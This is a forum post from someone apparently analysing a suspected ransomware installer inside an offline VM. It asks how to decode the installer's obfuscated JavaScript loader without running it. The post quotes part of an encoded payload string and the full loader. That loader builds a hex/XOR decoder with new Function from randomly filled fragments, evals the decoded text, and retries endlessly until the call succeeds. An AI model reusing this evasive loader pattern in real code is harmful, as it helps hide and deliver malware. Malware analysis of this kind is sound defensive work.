Hi there folks,
I’ve received what I’m pretty sure is a ransomware installer and I’d really like to see how it works, but I’m wondering how I can deobfuscate it for viewing without executing it. I won’t post it in its entirety for obvious reasons, but it’s assigning a var in the following manner:
var e4="cb5ed34dc_56cf5bfd4cf051ea57f956"+
"ff18d15fd45dde4cae7cd759c74c_a59"+
"a97ef74ad457c655a26dfb4aea54b810"+
"d04dd14aff54fd14f618b35be359fc54"+
"e054a25af859cd5bd553d411_a43e74c"+
"b34ac_41a543fe4ed_59_44aac18_c40"+
"c155f254d570_14cd64cb748_f18f305"+
"a318a356ce5d_f4ff_18af79f25be14c"+
"a951aa4ef_5de560cd77e55af852cd5d"+
"e95b__4ccf10_31a_175aa6bac60e475"+
"bc74f_0ae716b160b_75cf74cc70ef6c"+
Which goes on for a really long time, then it handles it:
/**
 * Returns one character picked at random from "a", "e", "s", "+", "g".
 * db() splices these picks into the source text it compiles, so the text
 * it builds differs from call to call.
 */
function c5()
{
  var pool=["a","e","s","+","g"];
  var pick=Math.floor(Math.random()*pool.length);
  return pool[pick];
}
/**
 * Decodes the string d5 and evaluates the decoded text as JavaScript.
 *
 * The decoder itself is compiled at call time with new Function, from string
 * fragments joined by seven c5() calls that each supply one random character.
 * When the picks are "a","g","e","e","s","+","a" the assembled source reads:
 *
 *   var f0=b8.match(/\S{4}/g),e1="",e6=0;
 *   while(e6<f0.length){e1+=String.fromCharCode(parseInt(f0[e6].substr(2,2),16)^56);e6++;}
 *   return eval(e1);
 *
 * That is: split the input (b8, bound to d5) into runs of four non-whitespace
 * characters, read characters 2-3 of each run as a hex byte (the first two
 * characters of the run are not used), XOR that byte with 56, append the
 * resulting character to e1, and finally eval e1.
 * Other picks produce different source text, which presumably fails to
 * compile or throws when run; b0() discards that error and calls db() again.
 *
 * NOTE(review): eval(e1) is the single point where the decoded text becomes
 * running code. Everything before it only builds a string, so the payload
 * can be read as plain text by reproducing the hex/XOR step on the data
 * without the eval, inside an isolated analysis environment.
 *
 * @param {string} d5 - encoded payload; handed unchanged to the generated function.
 * @returns {*} whatever eval(e1) returns.
 */
function db(d5)
{
// One-line decoder: the c5() calls fill in the missing letters of match, the
// regex flag, while, fromCharCode, substr, the ++ operator and eval.
return (new Function("b8","var f0=b8.m"+c5()+"tch(/\\S{"+""+"4}/"+c5()+"),e1=\"\",e6=0"+""+";whil"+c5()+"(e6<f0.length){e1+="+""+"String.fromCharCod"+c5()+"(parseInt(f0[e6].sub"+c5()+"tr(2,2),16)^56);e6+"+c5()+";}return ev"+c5()+""+""+"l(e1);")(d5));
}
/**
 * Calls db(c3) repeatedly until one call completes without throwing, then
 * returns that call's result.
 *
 * Every exception is discarded and the attempt repeated, so there is no
 * upper bound on the number of iterations. db() compiles source assembled
 * from random characters, so many attempts can fail before one succeeds.
 *
 * @param {string} c3 - encoded payload passed straight through to db().
 * @returns {*} the value returned by the first db(c3) call that does not throw.
 */
function b0(c3)
{
  for(;;)
  {
    try
    {
      return db(c3);
    }
    catch(ignored)
    {
      // error dropped; the loop simply tries db(c3) again
    }
  }
}
// Top-level call: passes the encoded string e4 to b0, which keeps calling
// db() until its decode-and-eval step completes. Running this line is what
// executes the decoded payload.
b0(e4);
Could someone explain how I might alter it to simply spit out the code in its entirety, instead of executing it, so I could see how it works?
PS: Working on a non-network-cabled machine in a VM.
Thanks for your time!